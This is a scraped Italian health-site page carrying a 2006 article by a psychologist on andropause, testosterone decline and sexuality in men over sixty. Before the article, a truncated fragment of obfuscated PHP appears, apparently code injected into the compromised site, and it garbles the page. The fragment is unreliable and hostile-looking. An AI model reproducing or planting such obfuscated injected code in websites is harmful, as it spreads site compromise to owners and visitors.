=round(0+3))$_59=$_64[round(0+0.333333333333+0.333333333333+0.333333333333)];if($GLOBALS['_1188104000_'][60]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.5+0.5)];if($GLOBALS['_1188104000_'][73]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.2+0.2+0.2+0.2+0.2)];if($GLOBALS['_1188104000_'][89]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.333333333333+0.333333333333+0.333333333333)];if($GLOBALS['_1188104000_'][106]($_59) L'andropausa

Area Riservata



Ti ricordiamo che per rendere attivo il tuo account dopo la registrazione, sarà necessario aprire il messaggio email che riceverai e cliccare sul link di attivazione.

  

Salute Mentale

L'andropausa PDF 

4 ottobre 2006 - a cura di Annalisa Lo Monaco,  Psicologa - Consulente Sessuale e delle Relazioni Affettive

 

Diceva un andrologo: “L’astinenza è un lusso che ci si può concedere solo a 20 anni…”.

Cosa significa? Semplicemente che a 20 anni il tasso di testosterone è al massimo per cui, anche dopo un lungo periodo di astinenza, l’attività sessuale viene ripresa brillantemente e rapidamente alla prima occasione.

Un andrologo mi diceva che dai 60 anni in poi,  è più difficile riprendere l’attività sessuale dopo un prolungato periodo di astinenza, per questo gli andrologi consigliano di cercare di mantenere, nel tempo, una regolare attività sessuale.

 

Gli aspetti del climaterio maschile, a differenza di quello femminile, sono stati finora un po’ trascurati e ne sono state sottaciute le manifestazioni. Forse perché nelle donne l’interruzione delle mestruazioni costituisce un chiaro segno della menopausa, mentre nell’uomo l’insorgenza del climaterio è più lenta e progressiva.

Negli uomini intorno ai 55/60 anni di età si assiste, a volte, ad un cambiamento più psicologico che fisiologico; al raggiungimento dell’età pensionabile, quando il lavoro non assorbe più la maggior parte del tempo e delle energie, l’uomo, invece di cominciare a programmare un nuovo ciclo di vita, a volte cede un po’ alla depressione. Questo è un problema che si può superare con un po’ di aiuto, ma è importante non trascurare nessun sintomo di disagio sia fisico che psichico.

Demoliamo i luoghi comuni e cominciamo a pensare a quanto sia bella la vita anche dopo i 60 anni.

Può accadere, prima o poi, che l’uomo abbia qualche episodio di defaillance sessuale, ma questo rientra perfettamente nella norma, mentre a volte l’individuo tende a demonizzare la situazione o la persona o addirittura ad attribuire a quel dato episodio l’inizio della decadenza. Non è assolutamente cosi, anche perché la diminuzione del testosterone (vedi nota 1) si può definire importante verso i 70 anni. La capacità riproduttiva, pur conservata, diminuisce; ciò è dovuto al fatto che con l'invecchiamento si assiste ad una riduzione progressiva del volume dei tubuli seminiferi e delle cellule di Sertoli del testicolo. Il ritmo circadiano del testosterone (elevato al mattino e ridotto la sera) tende a scomparire. Si osserva, inoltre, un progressivo incremento nel sangue dell'estradiolo, l'ormone femminile, prodotto dal testicolo.

Secondo l’ISSAM (vedi nota 2), societa' medico-scientifica recentemente creata presso l'Universita' degli Studi di Parma e diretta dal professor Giorgio Valenti, almeno dal punto di vista medico gli uomini vengono 'trascurati' e ''…l'attenzione alla salute maschile - ha affermato il Presidente dell'Issam internazionale Bruno Lunenfeld - si e' sempre caratterizzata per frammentarietà e mancanza di coordinamento, con una minore attenzione da parte dell'uomo  verso la prevenzione'', anche che per il ‘'vuoto culturale che esiste intorno al concetto di andropausa'.

I gerontologi sono convinti che il disinteresse verso l'invecchiamento maschile abbia come conseguenza anche ‘la poca considerazione dell'aspetto sessuale, sino a oggi valutato come un problema di secondaria importanza quando ha invece importanti ricadute sulla qualità della vita’.

La sessualità dell'anziano, infatti, e' stata finora considerata una 'sessualità negata', alla quale va restituito il giusto valore essendo fondamentale per una vita armoniosa sia sul piano fisico sia sul piano psicologico.

Teniamo conto  che l’impulso sessuale e il desiderio sono bisogni primari nell’uomo, anche se a volte vengono mascherati dietro  piccole insicurezze e paure personali. La sessualità è quanto di più naturale esista e va vissuta con pienezza e soddisfazione,  come ogni giorno viviamo la vita.

La vita cambia, l’essere umano evolve così come l’approccio all’amore e al sesso cambia con  l’età, ma l’amore va fatto a 20-30 anni come a 50, a 60 anni e oltre.

Con l’andropausa non cambiano le sensazioni legate al piacere e alla sessualità, si modificano soltanto le modalità. Il tempo di eccitazione si allunga, consentendo però il dilungarsi in preliminari che permetteranno di soffermarci sul corpo del partner  baciandolo,  accarezzandolo:  le endorfine e dopamine si scatenano, aumentano le difese immunitarie e migliora senz’altro la qualità di vita da un punto di vista psico-fisico.  L’erezione compare più lentamente ma dura più tempo,  è meno turgida a causa del minore afflusso di sangue nei tessuti spugnosi del pene; le contrazioni muscolari  durante l’orgasmo possono essere di minore entità e il periodo di tempo che trascorre tra due orgasmi  si prolunga. Ma tutto questo è assolutamente trascurabile se consideriamo i benefici che se ne traggono.

Al di là della riuscita tecnica dell’approccio sessuale, la cosa importante è non perdere mai la voglia di toccarsi, accarezzarsi, mai perdere la confidenza fisica con il partner.

La difficoltà maggiore che si incontra, quando  una coppia cerca una consulenza per riprendere una regolare attività sessuale, è insegnare loro a ritrovare il contatto con il proprio corpo e il corpo dell’altro. C’è sempre molta resistenza nel re-imparare a toccarsi, nel riprendere confidenza con il partner, ma teniamo sempre presente che il sesso e la sessualità dovranno avere una parte fondamentale nella nostra vita, così come il nostro corpo che andrà curato, ascoltato, tenuto in forma e ben alimentato.

Non perdete mai di vista il vostro valore, il valore che avete per chi vi sta vicino e vi ama e stima; per cui tenetevi da conto, curatevi, non perdete occasioni per ridere e divertirvi. Amerete così  meglio chi vi è accanto e vivrete al meglio e  in modo sereno quello che Jung definisce ‘Il mezzogiorno della vita’.

Note:

1) Il contenuto di testosterone nelle varie età:

  • 15-30 anni  ng/ml 5,5-8,5
  • 30-60 anni ng/ml  3,5-7,5
  • 60>    anni ng/ml  1  - 5

2) I.S.S.A.M. - The International Society for the Study of the Aging Male, fondata nel Regno Unito nel 1997; fondatore ed attuale presidente Prof. Bruno Lunenfeld, MD. I.S.S.A.M.-Italia - Società medico-scientifica presso l'Università di Parma diretta dal Prof. Giorgio Valenti

 

Per migliorare la tua navigazione su questo sito, utilizziamo cookies ed altre tecnologie che ci permettono di riconoscerti. Utilizzando questo sito, acconsenti agli utilizzi di cookies e delle altre tecnologie descritti nella nostra Cookies Policy Utilizzando questo sito, acconsenti agli utilizzi di cookies e delle altre tecnologie descritti nella nostra Cookies Policy.

Acconsento all'utilizzo dei cookies su questo sito